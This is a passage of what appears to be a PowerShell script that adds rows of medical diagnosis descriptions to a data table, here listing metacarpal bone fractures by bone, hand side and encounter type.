metacarpal bone, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of other metacarpal bone","Nondisplaced fracture of base of other metacarpal bone, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of other metacarpal bone","Nondisplaced fracture of base of other metacarpal bone, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of unspecified metacarpal bone","Nondisplaced fracture of base of unspecified metacarpal bone, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of unspecified metacarpal bone","Nondisplaced fracture of base of unspecified metacarpal bone, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of unspecified metacarpal bone","Nondisplaced fracture of base of unspecified metacarpal bone, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of unspecified metacarpal bone","Nondisplaced fracture of base of unspecified metacarpal bone, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of unspecified metacarpal bone","Nondisplaced fracture of base of unspecified metacarpal bone, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of unspecified metacarpal bone","Nondisplaced fracture of base of unspecified metacarpal bone, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of base of unspecified metacarpal bone","Nondisplaced fracture of base of unspecified metacarpal bone, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of second metacarpal bone, right hand","Nondisplaced fracture of shaft of second metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of second metacarpal bone, right hand","Nondisplaced fracture of shaft of second metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of second metacarpal bone, right hand","Nondisplaced fracture of shaft of second metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of second metacarpal bone, right hand","Nondisplaced fracture of shaft of second metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of second metacarpal bone, right hand","Nondisplaced fracture of shaft of second metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of second metacarpal bone, right hand","Nondisplaced fracture of shaft of second metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of second metacarpal bone, right hand","Nondisplaced fracture of shaft of second metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of second metacarpal bone, left hand","Nondisplaced fracture of shaft of second metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of second metacarpal bone, left hand","Nondisplaced fracture of shaft of second metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of second metacarpal bone, left hand","Nondisplaced fracture of shaft of second metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of second metacarpal bone, left hand","Nondisplaced fracture of shaft of second metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of second metacarpal bone, left hand","Nondisplaced fracture of shaft of second metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of second metacarpal bone, left hand","Nondisplaced fracture of shaft of second metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of second metacarpal bone, left hand","Nondisplaced fracture of shaft of second metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of third metacarpal bone, right hand","Nondisplaced fracture of shaft of third metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of third metacarpal bone, right hand","Nondisplaced fracture of shaft of third metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of third metacarpal bone, right hand","Nondisplaced fracture of shaft of third metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of third metacarpal bone, right hand","Nondisplaced fracture of shaft of third metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of third metacarpal bone, right hand","Nondisplaced fracture of shaft of third metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of third metacarpal bone, right hand","Nondisplaced fracture of shaft of third metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of third metacarpal bone, right hand","Nondisplaced fracture of shaft of third metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of third metacarpal bone, left hand","Nondisplaced fracture of shaft of third metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of third metacarpal bone, left hand","Nondisplaced fracture of shaft of third metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of third metacarpal bone, left hand","Nondisplaced fracture of shaft of third metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of third metacarpal bone, left hand","Nondisplaced fracture of shaft of third metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of third metacarpal bone, left hand","Nondisplaced fracture of shaft of third metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of third metacarpal bone, left hand","Nondisplaced fracture of shaft of third metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of third metacarpal bone, left hand","Nondisplaced fracture of shaft of third metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fourth metacarpal bone, right hand","Nondisplaced fracture of shaft of fourth metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fourth metacarpal bone, right hand","Nondisplaced fracture of shaft of fourth metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fourth metacarpal bone, right hand","Nondisplaced fracture of shaft of fourth metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fourth metacarpal bone, right hand","Nondisplaced fracture of shaft of fourth metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fourth metacarpal bone, right hand","Nondisplaced fracture of shaft of fourth metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fourth metacarpal bone, right hand","Nondisplaced fracture of shaft of fourth metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fourth metacarpal bone, right hand","Nondisplaced fracture of shaft of fourth metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fourth metacarpal bone, left hand","Nondisplaced fracture of shaft of fourth metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fourth metacarpal bone, left hand","Nondisplaced fracture of shaft of fourth metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fourth metacarpal bone, left hand","Nondisplaced fracture of shaft of fourth metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fourth metacarpal bone, left hand","Nondisplaced fracture of shaft of fourth metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fourth metacarpal bone, left hand","Nondisplaced fracture of shaft of fourth metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fourth metacarpal bone, left hand","Nondisplaced fracture of shaft of fourth metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fourth metacarpal bone, left hand","Nondisplaced fracture of shaft of fourth metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fifth metacarpal bone, right hand","Nondisplaced fracture of shaft of fifth metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fifth metacarpal bone, right hand","Nondisplaced fracture of shaft of fifth metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fifth metacarpal bone, right hand","Nondisplaced fracture of shaft of fifth metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fifth metacarpal bone, right hand","Nondisplaced fracture of shaft of fifth metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fifth metacarpal bone, right hand","Nondisplaced fracture of shaft of fifth metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fifth metacarpal bone, right hand","Nondisplaced fracture of shaft of fifth metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fifth metacarpal bone, right hand","Nondisplaced fracture of shaft of fifth metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fifth metacarpal bone, left hand","Nondisplaced fracture of shaft of fifth metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fifth metacarpal bone, left hand","Nondisplaced fracture of shaft of fifth metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fifth metacarpal bone, left hand","Nondisplaced fracture of shaft of fifth metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fifth metacarpal bone, left hand","Nondisplaced fracture of shaft of fifth metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fifth metacarpal bone, left hand","Nondisplaced fracture of shaft of fifth metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fifth metacarpal bone, left hand","Nondisplaced fracture of shaft of fifth metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of fifth metacarpal bone, left hand","Nondisplaced fracture of shaft of fifth metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of other metacarpal bone","Nondisplaced fracture of shaft of other metacarpal bone, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of other metacarpal bone","Nondisplaced fracture of shaft of other metacarpal bone, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of other metacarpal bone","Nondisplaced fracture of shaft of other metacarpal bone, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of other metacarpal bone","Nondisplaced fracture of shaft of other metacarpal bone, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of other metacarpal bone","Nondisplaced fracture of shaft of other metacarpal bone, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of other metacarpal bone","Nondisplaced fracture of shaft of other metacarpal bone, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of other metacarpal bone","Nondisplaced fracture of shaft of other metacarpal bone, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of unspecified metacarpal bone","Nondisplaced fracture of shaft of unspecified metacarpal bone, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of unspecified metacarpal bone","Nondisplaced fracture of shaft of unspecified metacarpal bone, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of unspecified metacarpal bone","Nondisplaced fracture of shaft of unspecified metacarpal bone, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of unspecified metacarpal bone","Nondisplaced fracture of shaft of unspecified metacarpal bone, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of unspecified metacarpal bone","Nondisplaced fracture of shaft of unspecified metacarpal bone, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of unspecified metacarpal bone","Nondisplaced fracture of shaft of unspecified metacarpal bone, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of shaft of unspecified metacarpal bone","Nondisplaced fracture of shaft of unspecified metacarpal bone, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of second metacarpal bone, right hand","Nondisplaced fracture of neck of second metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of second metacarpal bone, right hand","Nondisplaced fracture of neck of second metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of second metacarpal bone, right hand","Nondisplaced fracture of neck of second metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of second metacarpal bone, right hand","Nondisplaced fracture of neck of second metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of second metacarpal bone, right hand","Nondisplaced fracture of neck of second metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of second metacarpal bone, right hand","Nondisplaced fracture of neck of second metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of second metacarpal bone, right hand","Nondisplaced fracture of neck of second metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of second metacarpal bone, left hand","Nondisplaced fracture of neck of second metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of second metacarpal bone, left hand","Nondisplaced fracture of neck of second metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of second metacarpal bone, left hand","Nondisplaced fracture of neck of second metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of second metacarpal bone, left hand","Nondisplaced fracture of neck of second metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of second metacarpal bone, left hand","Nondisplaced fracture of neck of second metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of second metacarpal bone, left hand","Nondisplaced fracture of neck of second metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of second metacarpal bone, left hand","Nondisplaced fracture of neck of second metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of third metacarpal bone, right hand","Nondisplaced fracture of neck of third metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of third metacarpal bone, right hand","Nondisplaced fracture of neck of third metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of third metacarpal bone, right hand","Nondisplaced fracture of neck of third metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of third metacarpal bone, right hand","Nondisplaced fracture of neck of third metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of third metacarpal bone, right hand","Nondisplaced fracture of neck of third metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of third metacarpal bone, right hand","Nondisplaced fracture of neck of third metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of third metacarpal bone, right hand","Nondisplaced fracture of neck of third metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of third metacarpal bone, left hand","Nondisplaced fracture of neck of third metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of third metacarpal bone, left hand","Nondisplaced fracture of neck of third metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of third metacarpal bone, left hand","Nondisplaced fracture of neck of third metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of third metacarpal bone, left hand","Nondisplaced fracture of neck of third metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of third metacarpal bone, left hand","Nondisplaced fracture of neck of third metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of third metacarpal bone, left hand","Nondisplaced fracture of neck of third metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of third metacarpal bone, left hand","Nondisplaced fracture of neck of third metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fourth metacarpal bone, right hand","Nondisplaced fracture of neck of fourth metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fourth metacarpal bone, right hand","Nondisplaced fracture of neck of fourth metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fourth metacarpal bone, right hand","Nondisplaced fracture of neck of fourth metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fourth metacarpal bone, right hand","Nondisplaced fracture of neck of fourth metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fourth metacarpal bone, right hand","Nondisplaced fracture of neck of fourth metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fourth metacarpal bone, right hand","Nondisplaced fracture of neck of fourth metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fourth metacarpal bone, right hand","Nondisplaced fracture of neck of fourth metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fourth metacarpal bone, left hand","Nondisplaced fracture of neck of fourth metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fourth metacarpal bone, left hand","Nondisplaced fracture of neck of fourth metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fourth metacarpal bone, left hand","Nondisplaced fracture of neck of fourth metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fourth metacarpal bone, left hand","Nondisplaced fracture of neck of fourth metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fourth metacarpal bone, left hand","Nondisplaced fracture of neck of fourth metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fourth metacarpal bone, left hand","Nondisplaced fracture of neck of fourth metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fourth metacarpal bone, left hand","Nondisplaced fracture of neck of fourth metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fifth metacarpal bone, right hand","Nondisplaced fracture of neck of fifth metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fifth metacarpal bone, right hand","Nondisplaced fracture of neck of fifth metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fifth metacarpal bone, right hand","Nondisplaced fracture of neck of fifth metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fifth metacarpal bone, right hand","Nondisplaced fracture of neck of fifth metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fifth metacarpal bone, right hand","Nondisplaced fracture of neck of fifth metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fifth metacarpal bone, right hand","Nondisplaced fracture of neck of fifth metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fifth metacarpal bone, right hand","Nondisplaced fracture of neck of fifth metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fifth metacarpal bone, left hand","Nondisplaced fracture of neck of fifth metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fifth metacarpal bone, left hand","Nondisplaced fracture of neck of fifth metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fifth metacarpal bone, left hand","Nondisplaced fracture of neck of fifth metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fifth metacarpal bone, left hand","Nondisplaced fracture of neck of fifth metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fifth metacarpal bone, left hand","Nondisplaced fracture of neck of fifth metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fifth metacarpal bone, left hand","Nondisplaced fracture of neck of fifth metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of fifth metacarpal bone, left hand","Nondisplaced fracture of neck of fifth metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of other metacarpal bone","Nondisplaced fracture of neck of other metacarpal bone, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of other metacarpal bone","Nondisplaced fracture of neck of other metacarpal bone, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of other metacarpal bone","Nondisplaced fracture of neck of other metacarpal bone, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of other metacarpal bone","Nondisplaced fracture of neck of other metacarpal bone, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of other metacarpal bone","Nondisplaced fracture of neck of other metacarpal bone, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of other metacarpal bone","Nondisplaced fracture of neck of other metacarpal bone, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of other metacarpal bone","Nondisplaced fracture of neck of other metacarpal bone, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified metacarpal bone","Nondisplaced fracture of neck of unspecified metacarpal bone, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified metacarpal bone","Nondisplaced fracture of neck of unspecified metacarpal bone, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified metacarpal bone","Nondisplaced fracture of neck of unspecified metacarpal bone, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified metacarpal bone","Nondisplaced fracture of neck of unspecified metacarpal bone, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified metacarpal bone","Nondisplaced fracture of neck of unspecified metacarpal bone, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified metacarpal bone","Nondisplaced fracture of neck of unspecified metacarpal bone, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of neck of unspecified metacarpal bone","Nondisplaced fracture of neck of unspecified metacarpal bone, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of second metacarpal bone, right hand","Other fracture of second metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of second metacarpal bone, right hand","Other fracture of second metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of second metacarpal bone, right hand","Other fracture of second metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of second metacarpal bone, right hand","Other fracture of second metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of second metacarpal bone, right hand","Other fracture of second metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of second metacarpal bone, right hand","Other fracture of second metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of second metacarpal bone, right hand","Other fracture of second metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of second metacarpal bone, left hand","Other fracture of second metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of second metacarpal bone, left hand","Other fracture of second metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of second metacarpal bone, left hand","Other fracture of second metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of second metacarpal bone, left hand","Other fracture of second metacarpal bone, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of second metacarpal bone, left hand","Other fracture of second metacarpal bone, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of second metacarpal bone, left hand","Other fracture of second metacarpal bone, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of second metacarpal bone, left hand","Other fracture of second metacarpal bone, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of third metacarpal bone, right hand","Other fracture of third metacarpal bone, right hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of third metacarpal bone, right hand","Other fracture of third metacarpal bone, right hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of third metacarpal bone, right hand","Other fracture of third metacarpal bone, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of third metacarpal bone, right hand","Other fracture of third metacarpal bone, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of third metacarpal bone, right hand","Other fracture of third metacarpal bone, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of third metacarpal bone, right hand","Other fracture of third metacarpal bone, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of third metacarpal bone, right hand","Other fracture of third metacarpal bone, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of third metacarpal bone, left hand","Other fracture of third metacarpal bone, left hand, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of third metacarpal bone, left hand","Other fracture of third metacarpal bone, left hand, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of third metacarpal bone, left hand","Other fracture of third metacarpal bone, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of third metacarpal bone, left 